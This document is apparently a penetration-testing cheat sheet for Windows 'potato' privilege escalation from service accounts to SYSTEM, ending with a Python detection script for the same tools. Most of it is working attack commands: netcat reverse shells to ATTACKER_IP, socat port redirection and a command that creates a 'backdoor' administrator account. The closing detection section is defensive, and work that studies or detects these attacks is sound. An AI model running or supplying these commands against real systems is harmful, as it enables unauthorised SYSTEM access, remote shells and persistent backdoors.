Overview
Potato attacks exploit SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to escalate from a service account (IIS, MSSQL, etc.) to SYSTEM.
Check Privileges
```cmd
whoami /priv | findstr /i "impersonate assign"
```
If either is Enabled, potato attacks are viable.
| Privilege | Required by |
|---|---|
| SeImpersonatePrivilege | JuicyPotato, PrintSpoofer, GodPotato, SweetPotato, RoguePotato |
| SeAssignPrimaryTokenPrivilege | JuicyPotato |
Service accounts like IIS APPPOOL, NT AUTHORITY\LOCAL SERVICE, NT AUTHORITY\NETWORK SERVICE, and SQL Server accounts typically have these privileges by default.
Which Potato to Use
| Tool | Windows Version | Notes |
|---|---|---|
| JuicyPotato | 7, 8, 10 (< 1809), Server 2008–2016 | Needs valid CLSID |
| RoguePotato | 10, Server 2019 | Needs attacker-controlled machine |
| PrintSpoofer | 10, Server 2016/2019 | Simplest, abuses print spooler |
| GodPotato | All (.NET 4+) | Works on 2012–2022, most universal |
| SweetPotato | 10, Server 2016/2019 | Combines multiple techniques |
Download
Kali Linux
```bash
ls /usr/share/windows-resources/juicy-potato/
# /usr/share/windows-resources/juicy-potato/JuicyPotato.exe
```
GitHub
```text
# JuicyPotato
https://github.com/ohpe/juicy-potato/releases
# PrintSpoofer
https://github.com/itm4n/PrintSpoofer/releases
# GodPotato
https://github.com/BeichenDream/GodPotato/releases
# SweetPotato
https://github.com/CCob/SweetPotato/releases
# RoguePotato
https://github.com/antonioCoco/RoguePotato/releases
```
Check Architecture
```cmd
wmic os get osarchitecture
```
JuicyPotato
Abuses COM servers, identified by CLSID, to impersonate a SYSTEM token.
Basic Usage
```cmd
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami" -t *
```
Reverse Shell
```cmd
JuicyPotato.exe -l 1337 -p C:\Windows\Temp\nc.exe -a "-e cmd.exe ATTACKER_IP 4444" -t *
```
With Specific CLSID
```cmd
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * -c {CLSID}
```
Finding Valid CLSIDs
```text
# Test common CLSIDs
# Full list: https://ohpe.it/juicy-potato/CLSID
```
Common working CLSIDs:
| OS | CLSID |
|---|---|
| Windows 10 | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} |
| Windows Server 2016 | {8BC3F05E-D86B-11D0-A075-00C04FB68820} |
| Windows Server 2012 | {e60687f7-01a1-40aa-86ac-db1cbf673334} |
JuicyPotato does NOT work on Windows 10 build 1809+ and Server 2019+. Use PrintSpoofer or GodPotato instead.
PrintSpoofer
Abuses the print spooler service to capture a SYSTEM token. Simpler than JuicyPotato.
Interactive SYSTEM Shell
```cmd
PrintSpoofer.exe -i -c cmd
```
Execute Command as SYSTEM
```cmd
PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"
```
Reverse Shell
```cmd
PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```
GodPotato
Works on most modern Windows versions. Requires .NET 4+.
Check .NET Version
```cmd
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" /v Version
```
Execute Command
```cmd
GodPotato.exe -cmd "cmd /c whoami"
```
Reverse Shell
```cmd
GodPotato.exe -cmd "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```
Add Admin User
```cmd
GodPotato.exe -cmd "net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add"
```
SweetPotato
Combines multiple potato techniques (EfsPotato, PrintSpoofer, JuicyPotato).
Execute Command
```cmd
SweetPotato.exe -p C:\Windows\System32\cmd.exe -a "/c whoami"
```
Reverse Shell
```cmd
SweetPotato.exe -p C:\Windows\Temp\nc.exe -a "-e cmd.exe ATTACKER_IP 4444"
```
RoguePotato
For Windows 10 1809+ / Server 2019. Requires an attacker-controlled machine for OXID resolution.
Attacker (redirect port 135)
```bash
socat tcp-listen:135,reuseaddr,fork tcp:TARGET:9999
```
Victim
```cmd
RoguePotato.exe -r ATTACKER_IP -e "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" -l 9999
```
Quick Decision
```text
whoami /priv → SeImpersonatePrivilege enabled?
│
├─ Windows 10 < 1809 / Server 2016 → JuicyPotato
├─ Windows 10 1809+ / Server 2019 → PrintSpoofer or GodPotato
├─ .NET 4+ available → GodPotato (most universal)
└─ Need external listener → RoguePotato
```
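On the detection side, the command lines on this page double as process-creation signatures. The following is an added example, not code from the original page or from any of the tool projects: it triages process-creation records by tool image name and by the argument shapes shown above. The record layout `(user, image, cmdline)`, the function names, the `NT SERVICE\MSSQL` prefix and the sample events are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Image names of the tools covered on this page; a renamed binary will not match.
TOOL_NAMES = {"juicypotato.exe", "printspoofer.exe", "godpotato.exe",
              "sweetpotato.exe", "roguepotato.exe"}
# Argument shapes taken from the command lines shown on this page.
ARG_SHAPES = {
    "JuicyPotato": re.compile(r"^(?=.*\s-l\s+\d+)(?=.*\s-p\s+\S+)(?=.*\s-t\s+\*)", re.I),
    "RoguePotato": re.compile(r"^(?=.*\s-r\s+\S+)(?=.*\s-e\s+\S+)(?=.*\s-l\s+\d+)", re.I),
    "GodPotato": re.compile(r"\s-cmd\s+\S+", re.I),
}
# Accounts the page lists as holding the privileges by default (MSSQL prefix assumed).
SERVICE_PREFIXES = ("IIS APPPOOL\\", "NT AUTHORITY\\LOCAL SERVICE",
                    "NT AUTHORITY\\NETWORK SERVICE", "NT SERVICE\\MSSQL")


def indicators(image, cmdline):
    """Return the reasons a process-creation record resembles a potato tool."""
    name = PureWindowsPath(image).name.lower()
    hits = ["name:" + name] if name in TOOL_NAMES else []
    hits += ["args:" + label for label, rx in ARG_SHAPES.items() if rx.search(cmdline)]
    return hits


def triage(events):
    """Return (severity, user, hits); 'high' when a service account ran the process."""
    findings = []
    for user, image, cmdline in events:
        hits = indicators(image, cmdline)
        if hits:
            severity = "high" if user.upper().startswith(SERVICE_PREFIXES) else "medium"
            findings.append((severity, user, hits))
    return findings


# Constructed sample records (user, image, command line); not real logs.
SAMPLE_EVENTS = [
    (r"IIS APPPOOL\DefaultAppPool", r"C:\Windows\Temp\JuicyPotato.exe",
     r'JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami" -t *'),
    (r"NT AUTHORITY\NETWORK SERVICE", r"C:\Windows\Temp\svc.exe",
     'svc.exe -cmd "cmd /c whoami"'),
    (r"CORP\alice", r"C:\Windows\System32\PING.EXE", "ping -l 1337 10.0.0.5"),
    (r"CORP\bob", r"C:\Tools\PrintSpoofer.exe", "PrintSpoofer.exe -i -c cmd"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Argument-shape matches alone are weak signals because short flags collide with legitimate tools, so weight them by the account context before alerting.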